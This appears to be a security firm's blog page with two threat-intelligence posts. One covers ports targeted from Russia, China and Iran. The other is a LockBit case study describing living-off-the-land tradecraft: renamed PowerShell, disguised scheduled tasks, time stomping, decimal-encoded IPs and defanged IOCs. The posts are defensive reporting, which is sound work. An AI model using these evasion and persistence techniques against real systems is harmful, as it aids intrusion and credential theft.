Your Enemy Can Be Your Best Teacher

Your Enemy Can Be Your Best Teacher

Blog | Threat Intelligence Brief

Your Enemy Can Be Your Best Teacher

 

 

This quote attributed to the Dalai Lama inspired our analysts to take a thoughtful approach to monitoring our external nodes. We wanted to answer the question – what are the top 20 ports the top 3 cyber threat actor countries are hitting? Could the targeting from countries such as China, Russia, and Iran give us some insights into what they’re trying to exploit? So, we analyzed traffic from these countries from 1 May 2020 – 30 June 2020 and evaluated over 7 million sessions to identify the top targeted ports from each of these countries.

Key Findings

Our analysis of this data found the following trends:

  1. Russian traffic tends to focus on exploiting remote computing. Ports like 3389, and ports near it, along with VNC were heavily targeted.
  2. Chinese traffic is focused on databases and their infrastructure. MSSQL (1433) was by far and away the most targeted port, but other services include REDIS.
  3. Iranian traffic had components of both Russian and Chinese targeting, but also showed significant interest in IOT devices.

Analysis

We realize that not all traffic from these countries is bad, but it is fair to acknowledge these countries do host a significant amount of cyber threats. We hope that by monitoring and observing trends from these locations, we can start to discern potential interests in targeting, as well as assess what services may be at higher risk.

 

 

Russia

During this time, we clearly see that the #1 targeted port for Russian traffic was 445. This port is notoriously associated with SMB and the EternalBlue vulnerability. Anecdotally, we consulted some pen tester, friends and discovered, EternalBlue is still quite prevalent in the wild. Research on  Shodan reveals 1.5 million hits for port 445, and that the US and Russia are the two countries showing the most occurrences of this port being open.

The next top targeted port is Telnet (23) followed by Remote Desktop Protocol (3389). However, as we look at the rest of the top 20, a clear pattern emerges. Several ports surrounding 3389 are also being targeted. Based on our findings, and our knowledge gained from our incident response practice, it appears Russian traffic may be attempting to identify cases where clever systems administrators were trying to hide RDP on non-standard ports.

However, we also see port 5900 in the top 20 as well. This port is associated with VNC (Virtual Network Computing). VNC is a well-known remote access tool, but could obviously be repurposed for malicious purposes, just like RDP.

China

When we first started watching Chinese traffic, we were surprised to see their interest in 1433, MSSQL. While it has always maintained the #1 spot, the percentage of total traffic it represents varies between 30-40% over recent weeks. Other database ports on here include REDIS (6378-6381), Mysql (3306), and the AFS-3 protocol (7001, 7002).

We also witnessed some of the same interests that Russian activity exhibited with targeting on ports like 445 and 3389.

Everything considered, Chinese activity for this period was largely focused on databases. When we consider the breaches that Chinese actors have been indicted for over the last several years (Equifax, OPM), we start to realize their strategic interest in big data can certainly be considered a sustained trend.

Iran

Iranian activity appeared to focus on a combination of targets we saw exhibited by Russian and Chinese activity, including 445 and 1433. Surprisingly, we noticed a newcomer to the top 10: namely, port 9530. This port is unassigned according to the Internet Assigned Numbers Authority (IANA), however open source research indicates a large amount of Chinese IOT components such Xiongmai firmware can be accessed via backdoors after hitting port 9530–this is a tactic sometimes referred to as “port knocking.”

On a weekly basis, we provide our clients with intelligence on active targeting campaigns that we observe in the wild. During the week of 29 June 2020, we noticed Iranian activity targeting ports 5977 and 4876. Port 4876 is associated with the Tritium CAN Bus Bridge Service, a component associated with vehicles, which typically requires physical access to exploit vulnerabilities.

Conclusion

We found this exercise to be quite eye opening. While we hypothesized that RDP would be of interest, we were surprised to see the variation in ports that Russian traffic was targeting. We also did not expect to find Iranian activity so interested in IOT devices. Chinese activity demonstrated ongoing and unwavering attention to databases that is unwavering.

 

About PacketWatch

We are threat hunters, investigators, intelligence analysts, and cybersecurity experts with experience in federal law enforcement, national security, and enterprise IT. Leveraging our expertise and our innovative use of technology, we help our clients find security risks that others may miss.

Please visit us at https://packetwatch.com/

Your Enemy Can Be Your Best Teacher

Living Off the Land (LOTL): A Case Study

Blog | Threat Intelligence Brief

Living Off the Land (LOTL): A Case Study

OVERVIEW

During a recent incident involving LockBit ransomware, we discovered a persistent credential harvester that was hidden as a scheduled task/process. We did a significant amount of investigation before unraveling the clues of what was creating alerts and attempting to beacon-out to certain IP addresses in Latvia.

During this investigation, we uncovered a heavy reliance on inherent functions built into Windows that were abused in order to masquerade as other processes, steal passwords, and exfiltrate them out of the organization.

This behavior is often referred to as “Living Off the Land.” In other words, no malware was used–just clever use of what is already available within the operating system.

 

KEY FINDINGS

Latvian Connection

The use of a Latvian VPN provider was a central part of the attacker’s infrastructure. It was also referred to throughout the scripts in decimal format. The IP address in question, 1484238829, translated to 88[.]119[.]175[.]237 when converted.

 

 

Renaming Powershell

In all cases when Powershell was being used, it was renamed to “modpro.exe.”

 

 

Picking a Name

The scripts would also create a scheduled task, and name it from one of 9 templates:

 

 

Choosing a Birthdate

The newly created tasks would also change their modified dates to be 485 days in the past. This is a process known as “time stomping” and would frustrate any attempts to look for newly created scheduled tasks.

 

 

Conclusion

This malware-less attack was quite sophisticated and complex to unravel. The multiple layers involved and numerous steps associated are all included in our full report. This report also includes references to the different techniques employed and the ATT&CK framework.

IOCs

88.119.175[.]237

88.119.175[.]81

 

More Information

Please see the full report for in-depth details.

 

About PacketWatch

We are threat hunters, investigators, intelligence analysts, and cybersecurity experts with experience in federal law enforcement, national security, and enterprise IT. Leveraging our expertise and our innovative use of technology, we help our clients find security risks that others may miss.

Please visit us at https://packetwatch.com/